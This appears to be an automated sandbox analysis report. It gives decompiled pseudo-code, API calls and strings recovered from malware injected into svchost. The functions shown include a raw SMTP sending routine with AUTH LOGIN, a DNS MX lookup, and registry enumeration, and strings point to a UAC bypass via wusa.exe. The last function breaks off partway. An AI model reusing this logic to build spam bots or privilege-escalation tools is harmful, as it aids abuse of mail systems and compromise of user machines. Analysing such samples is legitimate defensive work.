                                                                                • Instruction Fuzzy Hash: B8614B72A50218AFDB619FB4EC45FEA77F9FB08300F148069F969D21A1EB7199508F60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 56%
                                                                                			E0012A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                				short _v129;
                                                                                				char _v132;
                                                                                				char _v1156;
                                                                                				signed int _t59;
                                                                                				int _t60;
                                                                                				void* _t61;
                                                                                				char* _t62;
                                                                                				signed int _t63;
                                                                                				void* _t65;
                                                                                				signed int _t68;
                                                                                				signed int _t74;
                                                                                				signed int _t76;
                                                                                				signed int _t78;
                                                                                				signed int _t80;
                                                                                				void* _t82;
                                                                                				signed int _t85;
                                                                                				signed int _t87;
                                                                                				signed int _t92;
                                                                                				void* _t96;
                                                                                				intOrPtr _t102;
                                                                                				signed int _t103;
                                                                                				void* _t104;
                                                                                				int _t121;
                                                                                				intOrPtr _t123;
                                                                                				void* _t124;
                                                                                				CHAR* _t125;
                                                                                				intOrPtr* _t126;
                                                                                				intOrPtr* _t127;
                                                                                				signed int _t129;
                                                                                				void* _t130;
                                                                                				void* _t131;
                                                                                
                                                                                				_t102 = _a8;
                                                                                				_t59 = _t102 - 1;
                                                                                				_t125 =  &_v132;
                                                                                				if(_t59 > 0xb) {
                                                                                					L21:
                                                                                					_t60 = lstrlenA(_t125);
                                                                                					_t121 = _t60;
                                                                                					_t126 = __imp__#19;
                                                                                					_t61 =  *_t126(_a4, _t125, _t121, 0);
                                                                                					if(_t61 == _t121) {
                                                                                						__eflags = _t102 - 6;
                                                                                						if(_t102 != 6) {
                                                                                							L28:
                                                                                							_t127 = __imp__#16;
                                                                                							_t103 = 0;
                                                                                							_push(0);
                                                                                							_v1156 = 0;
                                                                                							_v132 = 0;
                                                                                							_push(0x3f6);
                                                                                							_t62 =  &_v1156;
                                                                                							while(1) {
                                                                                								_t63 =  *_t127(_a4, _t62);
                                                                                								__eflags = _t63;
                                                                                								if(_t63 <= 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t103 = _t103 + _t63;
                                                                                								__eflags = _t103 - 0x1f4;
                                                                                								if(_t103 > 0x1f4) {
                                                                                									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
                                                                                									_push(6);
                                                                                									L72:
                                                                                									_pop(_t65);
                                                                                									return _t65;
                                                                                								}
                                                                                								__eflags = _v132;
                                                                                								 *((char*)(_t130 + _t103 - 0x480)) = 0;
                                                                                								if(_v132 != 0) {
                                                                                									L33:
                                                                                									_t68 = E0012EE95( &_v1156,  &_v132);
                                                                                									__eflags = _t68;
                                                                                									if(_t68 != 0) {
                                                                                										break;
                                                                                									}
                                                                                									L34:
                                                                                									_t92 = 0x3f6 - _t103;
                                                                                									__eflags = _t92;
                                                                                									_push(0);
                                                                                									_push(_t92);
                                                                                									_t62 = _t130 + _t103 - 0x480;
                                                                                									continue;
                                                                                								}
                                                                                								__eflags = _t103 - 3;
                                                                                								if(_t103 <= 3) {
                                                                                									goto L34;
                                                                                								}
                                                                                								E0012EE08( &_v132,  &_v1156, 4);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								__eflags = _v132;
                                                                                								_v129 = 0x20;
                                                                                								if(_v132 == 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L33;
                                                                                							}
                                                                                							_t123 = _a8;
                                                                                							__eflags = _t123 - 7;
                                                                                							if(_t123 == 7) {
                                                                                								L23:
                                                                                								_push(2);
                                                                                								goto L72;
                                                                                							}
                                                                                							__eflags = _t103 - 5;
                                                                                							if(_t103 <= 5) {
                                                                                								E0012EF00(_a16, "Too small respons\n");
                                                                                							} else {
                                                                                								E0012EE08(_a16,  &_v1156, 0x76);
                                                                                								_t131 = _t131 + 0xc;
                                                                                								_a16[0x76] = 0;
                                                                                							}
                                                                                							__eflags = _t103 - 5;
                                                                                							if(_t103 < 5) {
                                                                                								L71:
                                                                                								E0012EF00(_a16, "Incorrect respons");
                                                                                								_push(7);
                                                                                								goto L72;
                                                                                							} else {
                                                                                								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
                                                                                								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
                                                                                									goto L71;
                                                                                								}
                                                                                								_t104 = E0012EDAC( &_v1156);
                                                                                								__eflags = _t104 - 0xdc;
                                                                                								if(_t104 == 0xdc) {
                                                                                									L50:
                                                                                									_t129 = 1;
                                                                                									_t74 = E0012EE95( &_v1156, "ESMTP");
                                                                                									__eflags = _t74;
                                                                                									_t52 = _t74 != 0;
                                                                                									__eflags = _t52;
                                                                                									 *0x133668 = _t74 & 0xffffff00 | _t52;
                                                                                									_t123 = 1;
                                                                                									L51:
                                                                                									__eflags = _t123 - 0xc;
                                                                                									if(_t123 != 0xc) {
                                                                                										L54:
                                                                                										__eflags = _t129;
                                                                                										if(_t129 != 0) {
                                                                                											goto L23;
                                                                                										}
                                                                                										_t76 =  *0x133630; // 0x0
                                                                                										__eflags = _t76;
                                                                                										if(_t76 == 0) {
                                                                                											L70:
                                                                                											_push(0xb);
                                                                                											goto L72;
                                                                                										}
                                                                                										__eflags =  *0x133634 - _t129; // 0x0
                                                                                										if(__eflags == 0) {
                                                                                											goto L70;
                                                                                										}
                                                                                										__eflags =  *0x133638 - _t129; // 0x0
                                                                                										if(__eflags == 0) {
                                                                                											goto L70;
                                                                                										}
                                                                                										__eflags = _t123 - 4;
                                                                                										if(_t123 != 4) {
                                                                                											L61:
                                                                                											_t78 = E0012A699( &_v1156,  *0x133634);
                                                                                											__eflags = _t78;
                                                                                											if(_t78 == 0) {
                                                                                												_t80 = E0012A699( &_v1156,  *0x133638);
                                                                                												__eflags = _t80;
                                                                                												if(_t80 == 0) {
                                                                                													__eflags = _t123 - 3;
                                                                                													if(_t123 == 3) {
                                                                                														L69:
                                                                                														_t82 = E0012E819(1, "localcfg", "ip", E001230B5());
                                                                                														_push( &_v132);
                                                                                														_t85 = E0012EE95( &_v1156, E0012A7A3(_t82, _t82));
                                                                                														__eflags = _t85;
                                                                                														if(_t85 != 0) {
                                                                                															goto L62;
                                                                                														}
                                                                                														goto L70;
                                                                                													}
                                                                                													__eflags = _t123 - 4;
                                                                                													if(_t123 == 4) {
                                                                                														goto L69;
                                                                                													}
                                                                                													__eflags = _t123 - 5;
                                                                                													if(_t123 == 5) {
                                                                                														goto L69;
                                                                                													}
                                                                                													__eflags = _t123 - 6;
                                                                                													if(_t123 != 6) {
                                                                                														goto L70;
                                                                                													}
                                                                                													goto L69;
                                                                                												}
                                                                                												_push(0xa);
                                                                                												goto L72;
                                                                                											}
                                                                                											L62:
                                                                                											_push(9);
                                                                                											goto L72;
                                                                                										}
                                                                                										_t87 = E0012A699( &_v1156, _t76);
                                                                                										__eflags = _t87;
                                                                                										if(_t87 == 0) {
                                                                                											goto L61;
                                                                                										}
                                                                                										_push(8);
                                                                                										goto L72;
                                                                                									}
                                                                                									__eflags = _t104 - 0x217;
                                                                                									if(_t104 != 0x217) {
                                                                                										goto L54;
                                                                                									}
                                                                                									_push(0xf);
                                                                                									goto L72;
                                                                                								}
                                                                                								__eflags = _t104 - 0xfa;
                                                                                								if(_t104 == 0xfa) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0x162;
                                                                                								if(_t104 == 0x162) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0xdd;
                                                                                								if(_t104 == 0xdd) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0x14e;
                                                                                								if(_t104 == 0x14e) {
                                                                                									goto L50;
                                                                                								}
                                                                                								__eflags = _t104 - 0xeb;
                                                                                								if(_t104 == 0xeb) {
                                                                                									goto L50;
                                                                                								}
                                                                                								_t129 = 0;
                                                                                								goto L51;
                                                                                							}
                                                                                						}
                                                                                						_t124 = 5;
                                                                                						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
                                                                                						__eflags = _t96 - _t124;
                                                                                						if(_t96 == _t124) {
                                                                                							goto L28;
                                                                                						}
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
                                                                                						return _t124;
                                                                                					}
                                                                                					if(_t102 != 7) {
                                                                                						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
                                                                                						_push(5);
                                                                                						goto L72;
                                                                                					}
                                                                                					goto L23;
                                                                                				}
                                                                                				switch( *((intOrPtr*)(_t59 * 4 +  &M0012AB51))) {
                                                                                					case 0:
                                                                                						goto L28;
                                                                                					case 1:
                                                                                						_push(_a12);
                                                                                						_t100 =  &_v132;
                                                                                						if( *0x133668 == 0) {
                                                                                							_push("helo %s\r\n");
                                                                                						} else {
                                                                                							_push("ehlo %s\r\n");
                                                                                						}
                                                                                						goto L4;
                                                                                					case 2:
                                                                                						_push(_a12);
                                                                                						_push("mail from:<%s>\r\n");
                                                                                						goto L14;
                                                                                					case 3:
                                                                                						_push(_a12);
                                                                                						_push("rcpt to:<%s>\r\n");
                                                                                						L14:
                                                                                						__eax =  &_v132;
                                                                                						L4:
                                                                                						wsprintfA(_t100, ??);
                                                                                						goto L20;
                                                                                					case 4:
                                                                                						_push(7);
                                                                                						_push("data\r\n");
                                                                                						goto L19;
                                                                                					case 5:
                                                                                						goto L21;
                                                                                					case 6:
                                                                                						_push(7);
                                                                                						_push("quit\r\n");
                                                                                						goto L19;
                                                                                					case 7:
                                                                                						goto L21;
                                                                                					case 8:
                                                                                						_push(0xd);
                                                                                						_push("AUTH LOGIN\r\n");
                                                                                						L19:
                                                                                						__eax =  &_v132;
                                                                                						_push( &_v132);
                                                                                						__eax = E0012EE08();
                                                                                						goto L20;
                                                                                					case 9:
                                                                                						__eax = _a12;
                                                                                						__edx = __eax + 1;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                							__eflags = __cl;
                                                                                						} while (__cl != 0);
                                                                                						goto L9;
                                                                                					case 0xa:
                                                                                						__eax = _a12;
                                                                                						__edx = __eax + 1;
                                                                                						do {
                                                                                							__cl =  *__eax;
                                                                                							__eax = __eax + 1;
                                                                                							__eflags = __cl;
                                                                                						} while (__cl != 0);
                                                                                						L9:
                                                                                						__eax = __eax - __edx;
                                                                                						 *((char*)(__ebp + __eax - 0x80)) = 0;
                                                                                						L20:
                                                                                						_t131 = _t131 + 0xc;
                                                                                						goto L21;
                                                                                				}
                                                                                			}
                                                                                0x0012a7cb
                                                                                0x0012a7cf
                                                                                0x0012a7d3
                                                                                0x0012a7d9
                                                                                0x0012a87d
                                                                                0x0012a87e
                                                                                0x0012a886
                                                                                0x0012a88d
                                                                                0x0012a893
                                                                                0x0012a897
                                                                                0x0012a8bf
                                                                                0x0012a8c2
                                                                                0x0012a8f2
                                                                                0x0012a8f2
                                                                                0x0012a8f8
                                                                                0x0012a8fa
                                                                                0x0012a900
                                                                                0x0012a906
                                                                                0x0012a909
                                                                                0x0012a90a
                                                                                0x0012a978
                                                                                0x0012a97c
                                                                                0x0012a97e
                                                                                0x0012a980
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a912
                                                                                0x0012a914
                                                                                0x0012a91a
                                                                                0x0012a9b9
                                                                                0x0012a9c2
                                                                                0x0012ab4a
                                                                                0x0012ab4a
                                                                                0x00000000
                                                                                0x0012ab4a
                                                                                0x0012a920
                                                                                0x0012a924
                                                                                0x0012a92c
                                                                                0x0012a954
                                                                                0x0012a95f
                                                                                0x0012a966
                                                                                0x0012a968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a96a
                                                                                0x0012a96c
                                                                                0x0012a96c
                                                                                0x0012a96e
                                                                                0x0012a970
                                                                                0x0012a971
                                                                                0x00000000
                                                                                0x0012a971
                                                                                0x0012a92e
                                                                                0x0012a931
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a940
                                                                                0x0012a945
                                                                                0x0012a948
                                                                                0x0012a94c
                                                                                0x0012a952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a952
                                                                                0x0012a982
                                                                                0x0012a985
                                                                                0x0012a988
                                                                                0x0012a89e
                                                                                0x0012a89e
                                                                                0x00000000
                                                                                0x0012a89e
                                                                                0x0012a98e
                                                                                0x0012a991
                                                                                0x0012a9d1
                                                                                0x0012a993
                                                                                0x0012a99f
                                                                                0x0012a9a7
                                                                                0x0012a9aa
                                                                                0x0012a9aa
                                                                                0x0012a9d8
                                                                                0x0012a9db
                                                                                0x0012ab39
                                                                                0x0012ab41
                                                                                0x0012ab48
                                                                                0x00000000
                                                                                0x0012a9e1
                                                                                0x0012a9e1
                                                                                0x0012a9e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a9fb
                                                                                0x0012a9fe
                                                                                0x0012aa04
                                                                                0x0012aa32
                                                                                0x0012aa40
                                                                                0x0012aa41
                                                                                0x0012aa46
                                                                                0x0012aa49
                                                                                0x0012aa49
                                                                                0x0012aa4d
                                                                                0x0012aa52
                                                                                0x0012aa54
                                                                                0x0012aa54
                                                                                0x0012aa57
                                                                                0x0012aa68
                                                                                0x0012aa68
                                                                                0x0012aa6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa70
                                                                                0x0012aa75
                                                                                0x0012aa77
                                                                                0x0012ab35
                                                                                0x0012ab35
                                                                                0x00000000
                                                                                0x0012ab35
                                                                                0x0012aa7d
                                                                                0x0012aa83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa89
                                                                                0x0012aa8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012aa95
                                                                                [Graph residue: a column of node addresses (0x0012a7df to 0x0012ab33, interleaved with 0x00000000 entries) left over from the rendered control-flow graph; nothing beyond the addresses is recoverable]

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$send$lstrlenrecv
                                                                                • String ID: .$ $AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
                                                                                • API String ID: 3650048968-4264063882
                                                                                • Opcode ID: 2f329a3f4b7a1bd8e113ad93c62e3ad0bea1ce0ddfd2daa6c6e8bcb2006520b4
                                                                                • Instruction ID: f0f72bebd6bbf4854d0f560cd437055555478f80a4eb4b65468504e34f4c250c
                                                                                • Opcode Fuzzy Hash: 2f329a3f4b7a1bd8e113ad93c62e3ad0bea1ce0ddfd2daa6c6e8bcb2006520b4
                                                                                • Instruction Fuzzy Hash: 45A14272900335ABDF258B54FC96FAE7BA9EF14304FA40026F901A7090EB718DA8C757
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0012139A
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 00121571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                • API String ID: 1628651668-1839596206
                                                                                • Opcode ID: fd5a0eb28bf2d33d7401fc2beee3285def1cbe5be193dcb222a95966e966d953
                                                                                • Instruction ID: 1da20bd64fadefcccb6ac3230834cbf5d35547e3056bc75404a7d54191c02b0f
                                                                                • Opcode Fuzzy Hash: fd5a0eb28bf2d33d7401fc2beee3285def1cbe5be193dcb222a95966e966d953
                                                                                • Instruction Fuzzy Hash: A0F198B1508351EFD324CF64D888BAAB7E5FBD8304F10492DF996D7290D7B49984CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00122A62(void* __ecx, intOrPtr* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr* _v44;
                                                                                				signed short _v272;
                                                                                				char _v276;
                                                                                				long _v280;
                                                                                				char _v284;
                                                                                				signed short _v288;
                                                                                				signed short _v292;
                                                                                				long _v300;
                                                                                				long _v304;
                                                                                				intOrPtr _v308;
                                                                                				signed short _v324;
                                                                                				intOrPtr _v332;
                                                                                				signed short _v336;
                                                                                				signed int _v340;
                                                                                				signed int _v344;
                                                                                				void* _v348;
                                                                                				signed short _v352;
                                                                                				signed short _v356;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t53;
                                                                                				signed short _t66;
                                                                                				void** _t71;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				signed short _t79;
                                                                                				intOrPtr* _t81;
                                                                                				signed short _t82;
                                                                                				signed short _t83;
                                                                                				intOrPtr _t86;
                                                                                				signed int _t88;
                                                                                				void* _t90;
                                                                                				long _t91;
                                                                                				signed short _t92;
                                                                                				void* _t94;
                                                                                				intOrPtr _t50; // used throughout the body but absent from the decompiler's declaration list
                                                                                
                                                                                				_t77 = __ecx;
                                                                                				_t91 = 0;
                                                                                				 *_a12 = 1;
                                                                                				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
                                                                                				_t76 = _t50;
                                                                                				if(_t76 != 0) {
                                                                                					__imp__#23(2, 2, 0x11, _t78); // ws2_32 ordinal 23 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
                                                                                					_t79 = _t50;
                                                                                					_v288 = _t79;
                                                                                					if(_t79 == 0 || _t79 == 0xffffffff) {
                                                                                						HeapFree(GetProcessHeap(), _t91, _t76);
                                                                                						_t53 = 0;
                                                                                						goto L37;
                                                                                					} else {
                                                                                						_v304 = 0;
                                                                                						while(1) {
                                                                                							_v300 = _t91;
                                                                                							if(_v304 != _t91) {
                                                                                								_push(_t91);
                                                                                							} else {
                                                                                								_push(0x100);
                                                                                							}
                                                                                							__imp__#9(); // ws2_32 ordinal 9 = htons; result (masked to 16 bits) is passed to the query builder below
                                                                                							_t50 = E001226FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							if(_t50 != 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t86 = 0xc;
                                                                                							_t50 =  &_v276;
                                                                                							_v272 = _t79;
                                                                                							_v276 = 1;
                                                                                							_v284 = _t86;
                                                                                							_v280 = _t91;
                                                                                							__imp__#18(_t91, _t50, _t91, _t91,  &_v284); // ws2_32 ordinal 18 = select; _v276/_v272 form the single-socket fd_set, _v284/_v280 the 12-second timeval
                                                                                							if(_t50 <= 0) {
                                                                                								goto L32;
                                                                                							}
                                                                                							_t50 = E0012EE2A(_t77, _t76, _t91, 4);
                                                                                							_t94 = _t94 + 0xc;
                                                                                							__imp__#16(_t79, _t76, 0x1000, _t91); // ws2_32 ordinal 16 = recv(sock, buf, 0x1000, 0)
                                                                                							_t92 = _t50;
                                                                                							_v324 = _t92;
                                                                                							if(_t92 > 0 && _t92 > _t86) {
                                                                                								_t81 = __imp__#15; // ws2_32 ordinal 15 = ntohs
                                                                                								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf; // low nibble of the DNS header flags word = RCODE (0 NOERROR, 2 SERVFAIL, 3 NXDOMAIN)
                                                                                								if(_t88 == 3) {
                                                                                									L34:
                                                                                									 *_v44 = 2;
                                                                                									L35:
                                                                                									HeapFree(GetProcessHeap(), 0, _t76);
                                                                                									__imp__#3(_v292); // ws2_32 ordinal 3 = closesocket
                                                                                									_t53 = _v308;
                                                                                									L37:
                                                                                									return _t53;
                                                                                								}
                                                                                								if(_t88 != 2) {
                                                                                									L16:
                                                                                									if(_t88 != 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_t50 = E00122923(_t77, _t76, _t92);
                                                                                									_pop(_t77);
                                                                                									_v336 = _t50;
                                                                                									if(_t50 == 0) {
                                                                                										goto L32;
                                                                                									}
                                                                                									_v340 = _v340 & 0x00000000;
                                                                                									_v344 = _v344 & 0x00000000;
                                                                                									_t82 = _t50;
                                                                                									_v352 = _t82;
                                                                                									L20:
                                                                                									while(1) {
                                                                                										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) { // skip records unless class == IN (1), type == MX (0xf) and rdlength >= 3
                                                                                											L30:
                                                                                											_t83 =  *_t82;
                                                                                											_v352 = _t83;
                                                                                											if(_t83 != 0) {
                                                                                												_t82 = _v352;
                                                                                												continue;
                                                                                											}
                                                                                											goto L31;
                                                                                										} else {
                                                                                											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
                                                                                											if(_t90 == 0) {
                                                                                												L31:
                                                                                												_t50 = E00122904(_v336);
                                                                                												if(_v344 != 0) {
                                                                                													goto L35;
                                                                                												}
                                                                                												goto L32;
                                                                                											}
                                                                                											E0012EE2A(_t77, _t90, 0, 0x108);
                                                                                											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
                                                                                											_t94 = _t94 + 0xc;
                                                                                											__imp__#15(); // ws2_32 ordinal 15 = ntohs; converts the 16-bit value read from the record's rdata
                                                                                											 *(_t90 + 4) = _t66 & 0x0000ffff;
                                                                                											_t33 = _t90 + 8; // 0x8
                                                                                											E00122871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
                                                                                											_t77 = _t66;
                                                                                											if( *((char*)(_t90 + 8)) != 0) {
                                                                                												_t71 = _v344;
                                                                                												_v344 = _t90;
                                                                                												if(_t71 != 0) {
                                                                                													 *_t71 = _t90;
                                                                                												} else {
                                                                                													_v348 = _t90;
                                                                                												}
                                                                                											} else {
                                                                                												HeapFree(GetProcessHeap(), 0, _t90);
                                                                                											}
                                                                                											_t82 = _v356;
                                                                                											goto L30;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								_push( *(_t76 + 2) & 0x0000ffff);
                                                                                								if( *_t81() < 0) {
                                                                                									goto L34;
                                                                                								}
                                                                                								goto L16;
                                                                                							}
                                                                                							L32:
                                                                                							_v308 = _v308 + 1;
                                                                                							if(_v308 < 2) {
                                                                                								_t79 = _v292;
                                                                                								_t91 = 0;
                                                                                								continue;
                                                                                							}
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,74CB4F20), ref: 00122A83
                                                                                • HeapAlloc.KERNEL32(00000000,?,74CB4F20), ref: 00122A86
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 00122AA0
                                                                                • htons.WS2_32(00000000), ref: 00122ADB
                                                                                • select.WS2_32 ref: 00122B28
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 00122B4A
                                                                                • htons.WS2_32(?), ref: 00122B71
                                                                                • htons.WS2_32(?), ref: 00122B8C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00122BFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 1639031587-0
                                                                                • Opcode ID: 0853a2dd3052e008811e50229d9027bc9eabe50b93a337fe5b7a7dbbbef7b31d
                                                                                • Instruction ID: 4375dfb5966830756132825d2f4ab811fef39558848024788505553cf470af0f
                                                                                • Opcode Fuzzy Hash: 0853a2dd3052e008811e50229d9027bc9eabe50b93a337fe5b7a7dbbbef7b31d
                                                                                • Instruction Fuzzy Hash: AA61E471904325BFC7219F64EC48B6FBBE8FF88751F010809F94597250D7B4D8A08BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0012704C(intOrPtr _a4, int _a8, int _a12, int _a16, int* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				char _v16;
                                                                                				int _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				signed int _v32;
                                                                                				char _v64;
                                                                                				char _v363;
                                                                                				char _v364;
                                                                                				void _v400;
                                                                                				intOrPtr* _t88;
                                                                                				int* _t89;
                                                                                				int* _t90;
                                                                                				int* _t91;
                                                                                				char* _t93;
                                                                                				signed int _t96;
                                                                                				signed int _t97;
                                                                                				long _t99;
                                                                                				signed int _t107;
                                                                                				int _t109;
                                                                                				int _t119;
                                                                                				int _t121;
                                                                                				int _t122;
                                                                                				int _t123;
                                                                                				signed int _t125;
                                                                                				int _t130;
                                                                                				int _t136;
                                                                                				int _t149;
                                                                                				int _t155;
                                                                                				void* _t158;
                                                                                				void* _t166;
                                                                                				int _t196;
                                                                                				int _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                				void* _t207;
                                                                                
                                                                                				_t88 = _a8;
                                                                                				_t167 = 0;
                                                                                				_v16 = 0x12c;
                                                                                				_v24 = 0x20;
                                                                                				_v364 = 0;
                                                                                				if(_t88 != 0) {
                                                                                					 *_t88 = 0;
                                                                                				}
                                                                                				_t89 = _a12;
                                                                                				if(_t89 != _t167) {
                                                                                					 *_t89 = _t167;
                                                                                				}
                                                                                				_t90 = _a16;
                                                                                				if(_t90 != _t167) {
                                                                                					 *_t90 = _t167;
                                                                                				}
                                                                                				_t91 = _a20;
                                                                                				if(_t91 != _t167) {
                                                                                					 *_t91 = _t167;
                                                                                				}
                                                                                				_t93 = E00122544(0x1322f8,  &E001306AC, 0x2e, 0xe4, 0xc8);
                                                                                				_t204 = _t203 + 0x14;
                                                                                				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
                                                                                					L21:
                                                                                					_t96 = E0012EE2A(_t167, 0x1322f8, 0, 0x100) | 0xffffffff;
                                                                                					goto L22;
                                                                                				} else {
                                                                                					_t97 = E00126DC2(_t167);
                                                                                					_push( &_v16);
                                                                                					_push( &_v364);
                                                                                					_push( &_v28);
                                                                                					_v32 = _t97;
                                                                                					_push(0);
                                                                                					_push( &_v24);
                                                                                					_t167 =  &_v64;
                                                                                					_push( &_v64);
                                                                                					_v8 = 0;
                                                                                					_push(0);
                                                                                					while(1) {
                                                                                						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
                                                                                						if(_t99 == 0x103) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _t99;
                                                                                						if(_t99 != 0) {
                                                                                							L18:
                                                                                							_t25 =  &_v8;
                                                                                							 *_t25 =  &(_v8[1]);
                                                                                							__eflags =  *_t25;
                                                                                							_push( &_v16);
                                                                                							_push( &_v364);
                                                                                							_push( &_v28);
                                                                                							_push(0);
                                                                                							_push( &_v24);
                                                                                							_push( &_v64);
                                                                                							_push(_v8);
                                                                                							_v16 = 0x12c;
                                                                                							_v24 = 0x20;
                                                                                							continue;
                                                                                						}
                                                                                						__eflags = _v24 - _t99;
                                                                                						if(_v24 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v16 - _t99;
                                                                                						if(_v16 <= _t99) {
                                                                                							goto L18;
                                                                                						}
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 != 1) {
                                                                                							goto L18;
                                                                                						}
                                                                                						_t107 = E0012EED1( &_v64, E00122544(0x1322f8,  &E001306A0, 9, 0xe4, 0xc8));
                                                                                						_t206 = _t204 + 0x1c;
                                                                                						asm("sbb eax, eax");
                                                                                						_t109 =  ~_t107 + 1;
                                                                                						__eflags = _t109;
                                                                                						_v20 = _t109;
                                                                                						if(_t109 != 0) {
                                                                                							L23:
                                                                                							_v8 = E0012EE95( &_v364, E00122544(0x1322f8,  &E0013069C, 4, 0xe4, 0xc8));
                                                                                							E0012EE2A(_t167, 0x1322f8, 0, 0x100);
                                                                                							_t207 = _t206 + 0x28;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 == 0) {
                                                                                								__eflags = _v364 - 0x22;
                                                                                								if(_v364 == 0x22) {
                                                                                									E0012EF00( &_v364,  &_v363);
                                                                                									_t149 = E0012ED23( &_v364, 0x22);
                                                                                									_t207 = _t207 + 0x10;
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										 *_t149 = 0;
                                                                                									}
                                                                                								}
                                                                                								_t196 = E0012EE95( &_v364, E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8));
                                                                                								E0012EE2A(_t167, 0x1322f8, 0, 0x100);
                                                                                								__eflags = _t196;
                                                                                								if(_t196 != 0) {
                                                                                									_t119 = E0012ED77( &_v364, _a4);
                                                                                									__eflags = _t119;
                                                                                									if(_t119 != 0) {
                                                                                										 *_t196 = 0;
                                                                                										_t121 = E0012ED23( &_v364, 0x5c);
                                                                                										_v8 = _t121;
                                                                                										__eflags = _t121;
                                                                                										if(_t121 != 0) {
                                                                                											_t63 =  &_v8;
                                                                                											 *_t63 =  &(_v8[1]);
